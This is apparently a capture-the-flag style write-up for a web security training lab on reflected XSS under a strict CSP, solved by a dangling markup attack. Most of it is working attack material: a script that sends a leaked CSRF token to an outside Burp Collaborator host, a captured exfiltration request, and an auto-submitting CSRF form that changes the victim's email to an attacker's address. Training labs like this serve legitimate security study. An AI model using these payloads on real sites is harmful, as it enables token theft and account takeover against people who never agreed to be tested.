Reflected XSS protected by very strict CSP, with dangling markup attack.txt

Reflected XSS protected by very strict CSP, with dangling markup attack

Once again, the solution provided is very good. If you can't find the CSRF token in Collaborator, just do a ctr-f in the request:

GET /?%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20required%20type%3D%22hidden%22%20name%3D%22csrf%22%20value%3D%220d4dWjQjmBuNtrfnEPb2xgyFds9LxBiA%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cbutton%20class%3D HTTP/1.1
Host: pwpqqus57ws79u2n0vf85pnxqowek3.burpcollaborator.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://acb41f431ea774c3803515540145003e.web-security-academy.net/exploit
Accept-Encoding: gzip, deflate, br

First payload to get the CSRF token:

<script>
if(window.name) {
    new Image().src='//pwpqqus57ws79u2n0vf85pnxqowek3.burpcollaborator.net?'+encodeURIComponent(window.name);
    } else {
        location = 'https://ac861ff21ea3743480121594001100f7.web-security-academy.net/email?email=%22%3E%3Ca%20href=%22https://acb41f431ea774c3803515540145003e.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script> 

Second payload to solve the lab:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://ac861ff21ea3743480121594001100f7.web-security-academy.net/email/change-email" method="POST">
      <input type="hidden" name="email" value="hacker&#64;evil&#45;user&#46;net" />
      <input type="hidden" name="csrf" value="0d4dWjQjmBuNtrfnEPb2xgyFds9LxBiA" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>